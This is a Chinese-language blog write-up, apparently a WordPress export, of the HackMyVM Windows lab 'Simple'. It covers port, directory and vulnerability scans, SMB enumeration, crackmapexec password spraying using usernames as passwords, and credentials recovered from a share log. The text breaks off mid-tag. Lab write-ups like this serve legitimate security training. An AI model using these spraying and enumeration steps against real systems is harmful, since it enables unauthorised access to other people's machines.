{"id":517,"date":"2024-04-08T20:08:50","date_gmt":"2024-04-08T12:08:50","guid":{"rendered":"http:\/\/162.14.82.114\/?p=517"},"modified":"2024-04-08T20:09:40","modified_gmt":"2024-04-08T12:09:40","slug":"hmv-_-simple","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/517\/04\/08\/2024\/","title":{"rendered":"hmv[-_-]Simple"},"content":{"rendered":"<h1>Simple<\/h1>\n<p>\u597d\u50cf\u662fwindows\u7684\u9776\u573a\uff0c\u4eca\u5929\u8bd5\u8bd5\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007891.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007891.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408121116109\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007893.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007893.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408121227696\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nmap -sCV -p 1-65535 172.20.10.4<\/code><\/pre>\n<pre><code class=\"language-css\">PORT      STATE SERVICE       VERSION\n80\/tcp    open  http          Microsoft IIS httpd 10.0\n| http-methods: \n|_  Potentially risky methods: TRACE\n|_http-title: Simple\n|_http-server-header: Microsoft-IIS\/10.0\n135\/tcp   open  msrpc         Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n445\/tcp   open  microsoft-ds?\n5985\/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n47001\/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n49664\/tcp open  msrpc         Microsoft Windows RPC\n49665\/tcp open  msrpc         Microsoft Windows RPC\n49666\/tcp open  msrpc         Microsoft Windows RPC\n49667\/tcp open  msrpc         Microsoft Windows RPC\n49668\/tcp open  msrpc         Microsoft Windows RPC\n49669\/tcp open  msrpc         Microsoft Windows RPC\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-time: \n|   date: 2024-04-08T04:20:40\n|_  start_date: N\/A\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n|_clock-skew: 2s\n|_nbstat: NetBIOS name: SIMPLE, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:b7:b6:07 (Oracle VirtualBox virtual NIC)   <\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-css\">feroxbuster -u http:\/\/172.20.10.4 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 2 -s 200 301 302<\/code><\/pre>\n<pre><code class=\"language-css\">301      GET        2l       10w      160c http:\/\/172.20.10.4\/images =&gt; http:\/\/172.20.10.4\/images\/\n200      GET       60l      128w     1369c http:\/\/172.20.10.4\/03-comming-soon\/css\/responsive.css\n200      GET      134l      438w     3905c http:\/\/172.20.10.4\/03-comming-soon\/css\/styles.css\n200      GET       50l       96w     1481c http:\/\/172.20.10.4\/\n301      GET        2l       10w      160c http:\/\/172.20.10.4\/Images =&gt; http:\/\/172.20.10.4\/Images\/\n301      GET        2l       10w      159c http:\/\/172.20.10.4\/fonts =&gt; http:\/\/172.20.10.4\/fonts\/\n301      GET        2l       10w      160c http:\/\/172.20.10.4\/IMAGES =&gt; http:\/\/172.20.10.4\/IMAGES\/\n301      GET        2l       10w      159c http:\/\/172.20.10.4\/Fonts =&gt; http:\/\/172.20.10.4\/Fonts\/<\/code><\/pre>\n<p>\u626b\u63cf\u65f6\u95f4\u8fc7\u957f\uff0c\u4e0d\u7528\u7b49\uff0c\u5bf9\u6d4b\u8bd5\u6ca1\u5565\u5927\u7528\u5904\u3002<\/p>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.4<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.4\n+ Target Hostname:    172.20.10.4\n+ Target Port:        80\n+ Start Time:         2024-04-08 00:22:12 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Microsoft-IIS\/10.0\n+ \/: Retrieved x-powered-by header: ASP.NET.\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/LaQsQxLy.asmx: Retrieved x-aspnet-version header: 4.0.30319.\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .\n+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .\n+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host\n+ End Time:           2024-04-08 00:23:11 (GMT-4) (59 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007894.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007894.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408121938073\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007895.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007895.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408122017494\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u968f\u624b\u67e5\u770b\u4e00\u4e0b\u6f0f\u6d1e\uff0c\u6ca1\u5565\u53d1\u73b0\uff0c\u7ee7\u7eed\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u4e5f\u6ca1\u5565\u53d1\u73b0\uff1a<\/p>\n<p>\u63d0\u5230\u4e86\u51e0\u4e2a\u540d\u5b57\u5c1d\u8bd5\u8bb0\u5f55\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-apl\"># user.txt\necho &quot;ruy\\nmarcos\\nlander\\nbogo\\nvaiper&quot; &gt; user.txt<\/code><\/pre>\n<h3>\u654f\u611f\u7aef\u53e3<\/h3>\n<h4>SMB\u670d\u52a1<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ enum4linux 172.20.10.4 \nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Mon Apr  8 00:31:02 2024\n =========================================( Target Information )=========================================\nTarget ........... 172.20.10.4\nRID Range ........ 500-550,1000-1050\nUsername ......... &#039;&#039;\nPassword ......... &#039;&#039;\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n ============================( Enumerating Workgroup\/Domain on 172.20.10.4 )============================\n[+] Got domain\/workgroup name: WORKGROUP\n ================================( Nbtstat Information for 172.20.10.4 )================================\nLooking up status of 172.20.10.4\n        SIMPLE          &lt;20&gt; -         B &lt;ACTIVE&gt;  File Server Service\n        SIMPLE          &lt;00&gt; -         B &lt;ACTIVE&gt;  Workstation Service\n        WORKGROUP       &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain\/Workgroup Name\n\n        MAC Address = 08-00-27-B7-B6-07\n ====================================( Session Check on 172.20.10.4 )====================================\n[E] Server doesn&#039;t allow session using username &#039;&#039;, password &#039;&#039;.  Aborting remainder of tests.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ smbmap -H 172.20.10.4                                     \n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 0 SMB session(s)                                \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ smbclient \/\/172.20.10.4\/share                             \nPassword for [WORKGROUP\\kali]:\nsession setup failed: NT_STATUS_ACCESS_DENIED<\/code><\/pre>\n<p>\u53ef\u60dc\u6ca1\u5565\u6536\u83b7\u3002\u3002\u3002\u7206\u7834\u4e00\u4e0b\uff1f\u60f3\u8d77\u6765\u4e86\u7eff\u5e08\u5085\u7684\u90a3\u4e2a\u5de5\u5177\uff0c\u6628\u5929\u505azurrak\u7528\u5230\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">crackmapexec smb 172.20.10.4 -u user.txt -p user.txt<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007896.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007896.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408123531119\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u9614\u4ee5\u8bd5\u8bd5\uff1f<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Simple]\n\u2514\u2500$ smbclient \/\/172.20.10.4\/share -U bogo\nPassword for [WORKGROUP\\bogo]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n<p>\u6362\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Simple]\n\u2514\u2500$ smbclient -L \/\/172.20.10.4\/ -U bogo\nPassword for [WORKGROUP\\bogo]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n<p>\u4e0d\u884c\u54ea\u91cc\u5f04\u9519\u4e86\uff0c\u8fd8\u5f97\u91cd\u65b0\u63a2\u67e5\u4e00\u4e0b\uff0c\u7f51\u4e0a\u641c\u8fd9\u79cd\u62a5\u9519\u4e5f\u5f88\u5c11\uff0c\u6211\u91cd\u542f\u4e00\u4e0b\u9776\u673a\u8bd5\u8bd5\uff0c\u8fd8\u662f\u4f1a\u5b58\u5728\u4e00\u6837\u7684\u62a5\u9519\uff0c\u7136\u540e\u4e0a\u7f51\u627e\u5230\u4e86\u8fd9\u4e2a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007897.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007897.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408125920735\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u627eai\u95ee\u4e00\u4e0b\uff0c\u53d1\u73b0\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007898.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007898.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408130120232\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\uff1f\uff1f\uff1f\uff1f\uff1fwtf\uff01<\/p>\n<p>\u6211\u8fd9\u91cc\u76f4\u63a5\u8df3\u4e86\uff1a<\/p>\n<pre><code class=\"language-css\">smbclient -L \/\/172.20.10.4\/ -U bogo\nPassword for [WORKGROUP\\bogo]:\n\n    Sharename       Type      Comment\n    ---------       ----      -------\n    ADMIN$          Disk      Admin remota\n    C$              Disk      Recurso predeterminado\n    IPC$            IPC       IPC remota\n    LOGS            Disk      \n    WEB             Disk      <\/code><\/pre>\n<p>\u7136\u540e\u5f97\u5230<code>LOGS<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u4e0b\u4e00\u6b65\uff1a<\/p>\n<pre><code>smbclient \/\/172.20.10.4\/LOGS\/ -U bogo\nPassword for [WORKGROUP\\bogo]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n\n  20231008.log               \n\nsmb: \\&gt; get 20231008.log <\/code><\/pre>\n<pre><code class=\"language-bash\">cat 20231008.log\nPS C:\\&gt; dir \\\\127.0.0.1\\WEB\nAcceso denegado\nAt line:1 char:1\n+ dir \\\\127.0.0.1\\WEB\n+ ~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : PermissionDenied: (\\\\127.0.0.1\\WEB:String) [Get-ChildItem], UnauthorizedAccessException\n    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand\nCannot find path &#039;\\\\127.0.0.1\\WEB&#039; because it does not exist.\nAt line:1 char:1\n+ dir \\\\127.0.0.1\\WEB\n+ ~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : ObjectNotFound: (\\\\127.0.0.1\\WEB:String) [Get-ChildItem], ItemNotFoundException\n    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand\n\nPS C:\\&gt; net use \\\\127.0.0.1\\WEB\nSe ha completado el comando correctamente.\n\nPS C:\\&gt; dir \\\\127.0.0.1\\WEB\nAcceso denegado\nAt line:1 char:1\n+ dir \\\\127.0.0.1\\WEB\n+ ~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : PermissionDenied: (\\\\127.0.0.1\\WEB:String) [Get-ChildItem], UnauthorizedAccessException\n    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand\nCannot find path &#039;\\\\127.0.0.1\\WEB&#039; because it does not exist.\nAt line:1 char:1\n+ dir \\\\127.0.0.1\\WEB\n+ ~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : ObjectNotFound: (\\\\127.0.0.1\\WEB:String) [Get-ChildItem], ItemNotFoundException\n    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand\n\nPS C:\\&gt; net use \\\\127.0.0.1\\WEB \/user:marcos SuperPassword\nSe ha completado el comando correctamente.\n\nPS C:\\&gt; dir \\\\127.0.0.1\\WEB\n\n    Directorio: \\\\127.0.0.1\\WEB\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\nd-----        10\/8\/2023   9:46 PM                aspnet_client\n-a----        9\/26\/2023   6:46 PM            703 iisstart.htm\n-a----        10\/8\/2023  10:46 PM            158 test.php\n\nPS C:\\&gt; rm \\\\127.0.0.1\\WEB\\*.php\n\nPS C:\\&gt; dir \\\\127.0.0.1\\WEB\n\n    Directorio: \\\\127.0.0.1\\WEB\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\nd-----        10\/8\/2023   9:46 PM                aspnet_client\n-a----        9\/26\/2023   6:46 PM            703 iisstart.htm\n\nPS C:\\&gt; <\/code><\/pre>\n<p>\u8bf4\u660e\u627e\u5230\u4e86<code>WEB<\/code>\u76ee\u5f55\uff0c\u4ee5\u53ca\u8d26\u53f7\u5bc6\u7801\uff1a<code>user:marcos SuperPassword<\/code><\/p>\n<p>\u5230\u8fd9\u91cc\u4e3a\u6b62\uff0c\u6211\u90fd\u505a\u4e0d\u4e86\uff0c\u4e0b\u9762\u6211\u63a5\u7740\u5728\u672c\u673a\u4e0a\u8fdb\u884c\u64cd\u4f5c\u4e00\u4e0b\u54c8\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# smbclient \/\/172.20.10.4\/WEB\/ -U marcos\nPassword for [WORKGROUP\\marcos]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n<p>\u5f53\u6211\u6ca1\u8bf4\u3002\u3002\u3002\u3002\u9000\u4e00\u6b65\u8d8a\u60f3\u8d8a\u6c14\uff0c\u5c1d\u8bd5\u80fd\u4e0d\u80fd\u8fdb\u5165\u7cfb\u7edf\u4fee\u6539\u4e00\u4e0b\uff1a<\/p>\n<h3>\u89e3\u51b3bug<\/h3>\n<p>\u70b9\u51fb\u53f3\u8fb9\u7684\u90a3\u4e2a<code>ctrl+del<\/code>:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007899.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007899.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408132023596\" style=\"zoom: 80%;\" \/><\/div><\/p>\n<p>\u6309<code>esc<\/code>\u8fdb\u5165\u7528\u6237\u5217\u8868\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007900.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007900.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408132513088\" style=\"zoom: 67%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007901.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007901.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408132539336\" style=\"zoom: 80%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u5bc4\u4e86\uff0c\u8fd9\u4ee8\u5bc6\u7801\u6211\u4eec\u4e00\u4e2a\u90fd\u4e0d\u77e5\u9053\u3002\u3002\u3002\u6211\u9009\u4e86bogo\u7136\u540e\u7167\u7740\u9875\u9762\uff0c\u6309\u4e86\u5565<code>esc<\/code>\u5565\u7684\uff0c\u7136\u540e\u8f93\u5165\u7684\u5730\u65b9\u5168\u9009\u4e86<code>bogo<\/code>\uff0c\u7136\u540e\u83ab\u540d\u5947\u5999\u8fdb\u6765\u4e86\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007902.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007902.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408132800063\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u8981\u614c\uff0c\u4e0b\u9762\u8fd8\u8981\u6539\u4e00\u4e2a\uff0c\u6211\u4e0b\u9762\u518d\u622a\u56fe\uff1a<\/p>\n<p>\u518d\u626b\u4e00\u4e0b\u8bd5\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# smbclient -L \/\/172.20.10.4\/ -U bogo\nPassword for [WORKGROUP\\bogo]:\n\n        Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Admin remota\n        C$              Disk      Recurso predeterminado\n        IPC$            IPC       IPC remota\n        LOGS            Disk      \n        WEB             Disk      \nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 172.20.10.4 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007903.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007903.png\" 